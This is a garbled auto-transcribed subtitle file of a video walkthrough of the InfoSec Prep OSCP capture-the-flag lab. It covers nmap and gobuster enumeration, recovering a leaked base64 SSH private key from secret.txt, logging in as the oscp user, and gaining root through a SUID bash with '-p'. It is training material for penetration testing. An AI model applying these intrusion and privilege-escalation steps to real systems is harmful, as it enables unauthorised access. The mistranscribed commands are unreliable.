1
00:00:00,830 --> 00:00:04,730
Greetings, I'm Professor Kay and initiate video presentation.

2
00:00:04,760 --> 00:00:11,450
We're going to see how we go about completing the CTF walk through for InfoSec Prep OCP.

3
00:00:12,890 --> 00:00:19,220
This ETF was created by foreign spy with the support of the staff at InfoSec, this ETF is rated as

4
00:00:19,220 --> 00:00:24,740
easy, but there are plenty of walkthrough available on the Internet and on YouTube that make it much

5
00:00:24,740 --> 00:00:26,310
harder than it needs to be.

6
00:00:26,930 --> 00:00:32,240
This walk through was built using a number of online resources and walk Theroux's, including the walk

7
00:00:32,240 --> 00:00:40,670
through from the YouTube channel of I.T. Security Labs and the website of passing OCP by Alex Dhiab.

8
00:00:42,030 --> 00:00:48,300
The lab requirements for this capture flag exercise are one install of either virtual box or VM where

9
00:00:48,600 --> 00:00:56,430
those virtual boxes preferred, one virtual install of Linux and one virtual install of the infosec

10
00:00:56,430 --> 00:01:02,940
prep Colen OCP oveI file, which can be downloaded from the volume hub site.

11
00:01:03,270 --> 00:01:06,570
All links are provided for you inside of the lab while.

12
00:01:07,590 --> 00:01:13,920
To begin the lab, we both, your Calli attack machine and the OCP target are up and running inside

13
00:01:13,920 --> 00:01:21,480
of either virtual box or VMware next, ensure both their network settings are configured for net network.

14
00:01:21,780 --> 00:01:22,860
Let's see how that's done.

15
00:01:23,370 --> 00:01:25,470
So I'm going to upgrade a device on the go to network.

16
00:01:26,320 --> 00:01:31,690
And I'm going to do this on both my machine and the target machine, and I'm going to ensure that the

17
00:01:31,690 --> 00:01:34,420
network settings are that network.

18
00:01:35,610 --> 00:01:40,680
Once you have both virtual machines up and running, open up your target machine and you will have a

19
00:01:40,680 --> 00:01:47,190
terminal at the top left of the terminal, you will see an IP address that's been assigned to you for

20
00:01:47,220 --> 00:01:48,650
this particular machine.

21
00:01:49,110 --> 00:01:50,690
Take note of that IP address.

22
00:01:50,700 --> 00:01:52,020
You will need it for the lab.

23
00:01:53,440 --> 00:01:58,720
The next thing you want to do is open up a terminal on your calling machine and you and I have config.

24
00:02:00,400 --> 00:02:07,570
You show that you have an IP address for your Ethernet zero adapter or whatever Ethernet adapter is

25
00:02:07,570 --> 00:02:14,950
currently being used to connect you to this virtual network between you and your target is going, Taiping,

26
00:02:14,950 --> 00:02:15,370
clear.

27
00:02:16,570 --> 00:02:22,090
Now, I'm going to go ahead and ensure that I have connectivity between my calling machine and my target

28
00:02:22,480 --> 00:02:23,920
by doing a ping.

29
00:02:25,590 --> 00:02:30,660
And I have good replies now to break out of the sequence, I'm just going to do a control, see?

30
00:02:31,640 --> 00:02:33,290
And I can close out my terminal.

31
00:02:34,500 --> 00:02:39,780
On your counting machine, right, click on the desktop and from the context, when you scroll on down

32
00:02:39,780 --> 00:02:45,570
to where it says great folder, you're going to create a new folder and you can call it OCP.

33
00:02:47,060 --> 00:02:52,490
Once you have that folder created, go ahead and right, click on it and select from the context menu

34
00:02:52,670 --> 00:02:54,130
open terminal in here.

35
00:02:54,890 --> 00:03:01,130
And so as with every captured flag exercise or Pentax, the first thing we have to do is enumerate.

36
00:03:01,760 --> 00:03:07,820
So we have a target and we're going to enumerate it using and map and we're going to be looking for

37
00:03:07,820 --> 00:03:14,130
any services or ports that are currently running on that target that we might be able to exploit.

38
00:03:14,570 --> 00:03:24,170
So at the command prompt and map space Desh Small Letter S Capital C Space Desh Small Letter S Capital

39
00:03:24,170 --> 00:03:27,350
V followed by the IP address of my target.

40
00:03:27,680 --> 00:03:30,860
Now this is my IP address for my target.

41
00:03:31,130 --> 00:03:33,170
Your IP address will differ.

42
00:03:33,890 --> 00:03:34,520
Go ahead and hit.

43
00:03:34,520 --> 00:03:34,940
Enter.

44
00:03:36,770 --> 00:03:43,310
And Matt quickly returns our scan results and we see that our target is running S.H. on Port Twenty,

45
00:03:43,610 --> 00:03:47,000
an Apache Web server running on Port 80.

46
00:03:47,780 --> 00:03:52,700
We also have all the Virgin information for the software running on Port twenty two point eighty that

47
00:03:52,700 --> 00:03:58,160
we need in case we need to download exploits or run scripts.

48
00:03:59,360 --> 00:04:05,510
Now, what's interesting about the Web server is it shows us that there is a robust text file and it

49
00:04:05,510 --> 00:04:08,990
has one disallowed entry that might be of interest to us.

50
00:04:08,990 --> 00:04:15,230
And it also has a secret dot text file that is part of that robust text.

51
00:04:15,650 --> 00:04:17,650
So we're going to take a look at that in just a moment.

52
00:04:18,520 --> 00:04:25,720
But for first, going to do some more numeration, so let's go ahead and minimize this terminal, and

53
00:04:25,720 --> 00:04:31,210
if we need to, we can come back to the information later and we're going to open up a new terminal

54
00:04:31,240 --> 00:04:35,050
and we're going to continue on with our numeration running go buster.

55
00:04:35,860 --> 00:04:40,390
And I'm going to go ahead and copy and paste this long command from my left file.

56
00:04:41,500 --> 00:04:44,770
Ghostbuster is a tool for brute force in your eyes.

57
00:04:44,800 --> 00:04:47,560
Files and directories and DNS subdomains.

58
00:04:48,310 --> 00:04:51,750
So what I've done here is I typed in Ghostbusters space.

59
00:04:51,760 --> 00:05:02,350
I wanted to look for directories, DVR, dash you on the server with the address of 10 zero to 17,

60
00:05:02,770 --> 00:05:04,900
and we're going to use a word list.

61
00:05:04,900 --> 00:05:07,030
That's what the Dash W stands for.

62
00:05:07,040 --> 00:05:16,390
And that word list is located up inside of the US are for SlideShare for word list, a directory inside

63
00:05:16,390 --> 00:05:19,060
of that dirt buster directory.

64
00:05:19,400 --> 00:05:21,160
And it is called.

65
00:05:22,240 --> 00:05:30,700
Directory dash list dash to dot, three dash medium dot text, and we're looking for file types, which

66
00:05:30,700 --> 00:05:32,660
is what the Dash X represents.

67
00:05:32,950 --> 00:05:38,050
I want to look for file times for p h, html and text.

68
00:05:38,680 --> 00:05:40,150
Go ahead, run the command.

69
00:05:41,600 --> 00:05:47,450
As I go, but the results continue to flow in, we learn that we have a WordPress site running on our

70
00:05:47,450 --> 00:05:47,940
target.

71
00:05:48,260 --> 00:05:54,950
We have the WordPress content, the login license, the read me dot org, html file.

72
00:05:55,100 --> 00:06:00,530
And, of course, a robust text, along with the secret dot text that we're going to take a look at

73
00:06:00,530 --> 00:06:01,320
in just a moment.

74
00:06:01,760 --> 00:06:08,570
But you see that we have a lot of good targets that we can go after here and we can run WP scan.

75
00:06:08,810 --> 00:06:14,200
We could run some other tools if we so desire, but we're still in the enumeration phase.

76
00:06:14,510 --> 00:06:19,190
And so what I'm interested in is what's inside of that robust text file.

77
00:06:19,250 --> 00:06:24,230
And I'm especially interested in what's going on with that secret dot text.

78
00:06:24,480 --> 00:06:29,390
So what we're going to do next is open up a Web browser and we're going to go after that low hanging

79
00:06:29,390 --> 00:06:31,400
fruit that we just discussed.

80
00:06:32,890 --> 00:06:39,160
So let's go ahead and minimize this terminal, we can come back to it later if we so desire, and let's

81
00:06:39,160 --> 00:06:40,470
go ahead and open up a Web browser.

82
00:06:42,480 --> 00:06:49,080
So I've opened up my browser up inside of my desktop and I've just typed in the IP address of the target,

83
00:06:49,440 --> 00:06:52,050
which was 10 to 17.

84
00:06:52,110 --> 00:06:53,610
This is my IP address.

85
00:06:53,880 --> 00:07:00,870
Your IP address will probably differ and we can start by going over some of the information that's available

86
00:07:00,870 --> 00:07:04,080
to us up inside of this Web site.

87
00:07:04,640 --> 00:07:07,250
So let's begin by looking over the homepage here.

88
00:07:08,250 --> 00:07:13,830
And one thing that is of interest is that we find that there's only one user account that is available

89
00:07:13,830 --> 00:07:17,910
for this box and that user is Osip.

90
00:07:18,330 --> 00:07:20,220
We'll need to know that for later on.

91
00:07:21,090 --> 00:07:26,370
We can also take a look at the source information so I can click on this Web page and I can view the

92
00:07:26,370 --> 00:07:27,220
page source.

93
00:07:27,660 --> 00:07:33,090
Now, a lot of times up and side of the page source, you'll find that there's a lot of comments and

94
00:07:33,090 --> 00:07:39,370
there may be little pieces of information regarding passwords, user accounts and other information.

95
00:07:39,720 --> 00:07:41,850
Now, we're not seeing none of that on here.

96
00:07:42,240 --> 00:07:49,800
But as you go through these other sites and you do your prep for the OCP, this is something that you

97
00:07:49,800 --> 00:07:50,850
want to be aware of.

98
00:07:51,210 --> 00:07:58,770
Always look at the page source information to ensure that you're not missing anything that's going to

99
00:07:58,770 --> 00:07:59,520
set you back.

100
00:08:00,200 --> 00:08:04,110
Want to make sure you scroll on down here and you take a look at all the different links that you have

101
00:08:04,110 --> 00:08:04,710
available.

102
00:08:05,040 --> 00:08:06,150
There's Hello, World.

103
00:08:07,240 --> 00:08:14,080
You've got a number of different links in here that you can take a look at now, all of these are avenues

104
00:08:14,080 --> 00:08:18,570
for possible exploits, but we're going to do it a little different.

105
00:08:18,820 --> 00:08:21,460
We're not going to use tools for this CTF.

106
00:08:22,060 --> 00:08:28,660
Primarily, what we're going to do is use just the command line and we're going to capture that flag

107
00:08:28,870 --> 00:08:29,950
and see how we do that.

108
00:08:30,980 --> 00:08:33,440
Now to look at the robots that text file.

109
00:08:33,710 --> 00:08:44,030
All I have to do is type in or append a four robots, not text to the front of the IP address of the

110
00:08:44,030 --> 00:08:44,510
target.

111
00:08:44,960 --> 00:08:51,350
And you'll see here that we have something called secret and we go ahead and adjust my.

112
00:08:52,410 --> 00:08:53,910
View here, Mizo.

113
00:08:54,870 --> 00:09:02,910
OK, that's better now you can see that we have a secret check now the robust tax is designed to tell

114
00:09:02,910 --> 00:09:09,900
any of the spiders out there that are crawling the web looking for information to catalog, to ignore

115
00:09:09,930 --> 00:09:11,070
the secret text.

116
00:09:11,070 --> 00:09:19,680
In this case, we're telling the web crawlers do not catalog this particular resource that is on this

117
00:09:19,680 --> 00:09:21,570
Web server, disallow it.

118
00:09:22,080 --> 00:09:27,240
And a lot of times you also find other information up here, such as versioning, and you might even

119
00:09:27,240 --> 00:09:33,360
find a username or even a password that might be available to you that's been posted by the admin.

120
00:09:33,900 --> 00:09:41,790
Now, to look inside of that seekers' dot text, all I did was remove the robots dot text from the front

121
00:09:41,790 --> 00:09:49,290
of the IP address and I appended a four secret dot text to the IP address.

122
00:09:49,680 --> 00:09:52,110
I hit Enter and now I'm showing the contents.

123
00:09:52,710 --> 00:10:01,220
And what we have here is a base64 code and it's probably going to be for an SSA key.

124
00:10:01,680 --> 00:10:06,690
Now, the next thing we need to do is take everything that's inside of this secret text that we're going

125
00:10:06,690 --> 00:10:07,380
to copy it.

126
00:10:07,950 --> 00:10:11,880
So I'm going to go ahead and make sure I have everything copied from the top to the bottom.

127
00:10:12,980 --> 00:10:18,020
I'm going to right click and I'm going to copy, I'm then going to open up a new browser tab and in

128
00:10:18,020 --> 00:10:21,590
the search bar I'm going to type in base64 decoded.

129
00:10:22,460 --> 00:10:27,830
From those results, I would take the first one and I'm going to launch and I'm going to go to the website

130
00:10:27,830 --> 00:10:34,210
that's going to allow me to decode this base64 hash in his first window.

131
00:10:34,490 --> 00:10:40,400
I'm going to go ahead and do a control V and paste everything that I just copied off of that secret

132
00:10:40,640 --> 00:10:41,360
text file.

133
00:10:41,900 --> 00:10:45,200
I want to scroll on down and I'm going to press the decode button.

134
00:10:45,560 --> 00:10:52,670
And this is your decoded sixty four code that we copied over from that secret text file.

135
00:10:53,060 --> 00:11:00,230
Now, in this case, we have what's called a private key for our open S.H. So we're going to go ahead

136
00:11:00,230 --> 00:11:06,170
and copy this and say I'm going to do this, which is placed my mouse inside of the second window.

137
00:11:06,180 --> 00:11:07,410
I'm going to do a control.

138
00:11:07,520 --> 00:11:08,480
I'll do a control.

139
00:11:08,480 --> 00:11:12,290
See, I'm now going to minimize my browser.

140
00:11:14,150 --> 00:11:20,270
Once I back to my desktop, I'm just going to find my working directory, which is OSTP, right, click

141
00:11:20,270 --> 00:11:22,230
on it from the context menu.

142
00:11:22,250 --> 00:11:24,450
I'm going to select open a terminal here.

143
00:11:25,850 --> 00:11:29,020
Now I'm going to create a text file using an editor.

144
00:11:29,030 --> 00:11:30,380
Now my editor choice.

145
00:11:30,530 --> 00:11:33,430
Now you're free to use any text editor you want.

146
00:11:33,860 --> 00:11:39,260
I'm going to type in nano space key dot RSA.

147
00:11:39,590 --> 00:11:41,720
I'm going to hit enter now.

148
00:11:41,720 --> 00:11:43,040
I have a blank file.

149
00:11:43,730 --> 00:11:48,400
I'm going to right click inside of this blank file and I'm going to say page clipboard.

150
00:11:49,100 --> 00:11:58,250
Now I'm going to page the contents of that open S.H. private key into this text file and I'm going to

151
00:11:58,250 --> 00:12:00,530
save it by doing a control act.

152
00:12:01,310 --> 00:12:05,090
I do a control X and then it asks me, do you want to say the modified buffer?

153
00:12:05,480 --> 00:12:07,220
I'll type in Y for yes.

154
00:12:07,640 --> 00:12:15,140
Now I'm going to hit enter and we're back to the prompt now to see if I actually have that file inside

155
00:12:15,140 --> 00:12:17,060
of my OCP directory.

156
00:12:17,060 --> 00:12:18,380
I'll just type in ls.

157
00:12:19,280 --> 00:12:26,660
I see that I do have a file called Ketut RSA, if I want to see if I actually say the contents to this

158
00:12:26,660 --> 00:12:30,200
text file called Key Dot RSA, I can just do a cat.

159
00:12:31,140 --> 00:12:37,230
Space type in the name of the file that I want to print out to the terminal, which in this case is

160
00:12:37,590 --> 00:12:43,260
key, the RSA can enter and I see that I have the private key.

161
00:12:44,350 --> 00:12:49,270
You can go ahead and close out this terminal now, the next day we have to do for that file that we

162
00:12:49,270 --> 00:12:56,380
just created for the open S.H. private key is we have to set the permissions so that we have access

163
00:12:56,380 --> 00:13:01,270
to it when we get ready to launch that SSA shell over on to the target.

164
00:13:01,610 --> 00:13:02,420
Now to do this.

165
00:13:02,440 --> 00:13:07,160
I'm going to do the change my command and I'm going to use the numbers.

166
00:13:07,180 --> 00:13:12,970
Six hundred and I'm going to sign this permission to the key dot RSA file.

167
00:13:13,360 --> 00:13:14,620
I'm going to go ahead and hit enter.

168
00:13:15,680 --> 00:13:19,940
And it comes back to the command prompt, let me know that my command completed successfully.

169
00:13:20,820 --> 00:13:28,950
So earlier on, we discovered that there was only one user on that Web server, and that was Osip up

170
00:13:28,950 --> 00:13:32,220
inside of the secret text, we discovered the base.

171
00:13:32,220 --> 00:13:35,970
Sixty four code for the open, a private key.

172
00:13:35,970 --> 00:13:41,520
Now that we have both of those pieces of information, we can attempt to establish and assess each session

173
00:13:41,970 --> 00:13:44,280
on to the target machine.

174
00:13:44,940 --> 00:13:53,670
At my prompt, I typed in S.H. Space the name of the user, which is OSTP at the IP address of my target,

175
00:13:54,030 --> 00:14:03,780
which is 10 dot zero dot to 17 space dash I which means use the following file for the key, which is

176
00:14:03,780 --> 00:14:05,180
key dot RSA.

177
00:14:05,700 --> 00:14:07,920
I want to go ahead and hit enter.

178
00:14:09,350 --> 00:14:19,370
And it comes back and locks me on as OSTP to the target machine using S.H., I want to see if I can

179
00:14:19,370 --> 00:14:24,710
find the permissions and see that if I'm logged on a suitable or route and to do that, I'm just going

180
00:14:24,710 --> 00:14:26,150
to type in pseudo space.

181
00:14:26,150 --> 00:14:27,050
Dash I.

182
00:14:28,210 --> 00:14:28,960
Hit enter.

183
00:14:29,900 --> 00:14:33,100
And now it wants the pseudo password, which we don't have.

184
00:14:34,060 --> 00:14:40,000
So the next thing that we need to do is find out exactly what permissions I currently have available

185
00:14:40,000 --> 00:14:45,750
to me as the logged on user that I currently am now to do this.

186
00:14:45,760 --> 00:14:50,410
I'm just going to type in the following command here, meaning of all this.

187
00:14:51,250 --> 00:14:55,090
That is to say, the command syntax is available to you up inside the lab while.

188
00:14:56,680 --> 00:14:58,360
I'm going to go ahead and hit enter.

189
00:14:59,590 --> 00:15:04,940
And as you can see, is pulling up all of the files and directories that I currently have access to.

190
00:15:05,410 --> 00:15:07,880
It's not telling me that permissions, but that's OK.

191
00:15:08,530 --> 00:15:14,250
I think we've got an option here that's going to get us into the route, which is where we need to be,

192
00:15:14,260 --> 00:15:16,120
and that's going to be used in the Basche.

193
00:15:16,900 --> 00:15:18,270
But let's see how we do that.

194
00:15:19,180 --> 00:15:21,670
Now, Bash is most likely going to have.

195
00:15:22,490 --> 00:15:28,780
Route access to the system, and that means that who's ever using it is going to have route access.

196
00:15:29,150 --> 00:15:31,940
So we're going to go ahead and type in the following.

197
00:15:32,460 --> 00:15:40,640
We're going to type in a forward slash USAR forward slash bend forward slash bash.

198
00:15:41,030 --> 00:15:44,870
And we want to assign these permissions to the current user.

199
00:15:45,290 --> 00:15:48,020
So I'm typing a dash p now.

200
00:15:48,020 --> 00:15:57,260
If I run the ID command, we can see exactly what permissions that the user who's using the Basche permissions

201
00:15:57,350 --> 00:16:00,680
actually has some type and ID hit enter.

202
00:16:01,250 --> 00:16:08,030
And you can see that I'm now a member of the Group Zero which has route access and that's what we need.

203
00:16:09,780 --> 00:16:15,030
So the next time we want to do is change over to the root of the machine to do this and you can type

204
00:16:15,030 --> 00:16:22,110
in code for I'm a hit enter and now I'm at the root of the machine.

205
00:16:22,530 --> 00:16:29,210
Now, the next time we want to do is analysis to see what's actually available to us here.

206
00:16:29,220 --> 00:16:33,270
So I'm typing less and you'll see that we have a root folder.

207
00:16:34,350 --> 00:16:40,200
So we want to get into the root folder, because that's where our flag is some type and see the four

208
00:16:40,920 --> 00:16:41,580
root.

209
00:16:42,570 --> 00:16:48,390
And I should be inside of that root folder now and it's check, I can just do another else hit enter

210
00:16:49,140 --> 00:16:52,500
and you'll see that we have a number of items inside of here.

211
00:16:52,650 --> 00:16:54,090
And one of those is the flag.

212
00:16:54,090 --> 00:17:01,070
That text now to get the key to complete this capture the flag exercise for this voucher.

213
00:17:01,380 --> 00:17:07,650
I'm going to go ahead and get that text file out by typing in cat space.

214
00:17:08,550 --> 00:17:16,170
When I got text and you'll see that we have the key presented to us and so you can see that this capture,

215
00:17:16,170 --> 00:17:24,150
the exercise was very easy, but it was made easy by the individuals that actually worked on producing

216
00:17:24,150 --> 00:17:26,920
the walkthrough that I use for this video presentation.

217
00:17:27,680 --> 00:17:35,070
Now, that doesn't mean that it's always easy because there are a lot of other work crews that are 40

218
00:17:35,070 --> 00:17:41,460
minutes long, 15 minutes long and even over an hour long as they go through the process of trying to

219
00:17:41,460 --> 00:17:42,560
capture that flag.

220
00:17:43,050 --> 00:17:47,910
But we captured the flag without using any of the utilities at our disposal.

221
00:17:48,720 --> 00:17:55,950
We didn't have to run, scan or any other tools to try to capture a password or figure out how to get

222
00:17:55,950 --> 00:17:58,120
access to a shell on the target.

223
00:17:58,710 --> 00:18:06,240
We did it using just observation and enumeration of the target and looking for clues.

224
00:18:06,920 --> 00:18:11,880
And so that's going to conclude this short video presentation on how we go about completing the walkthrough

225
00:18:12,180 --> 00:18:16,280
for the infosec OCP capture to flag exercise.

226
00:18:16,590 --> 00:18:17,610
You got questions.

227
00:18:17,610 --> 00:18:18,720
You got concerns.

228
00:18:18,900 --> 00:18:24,180
Don't hesitate to reach out and contact your instructor and I'll see you in my next video.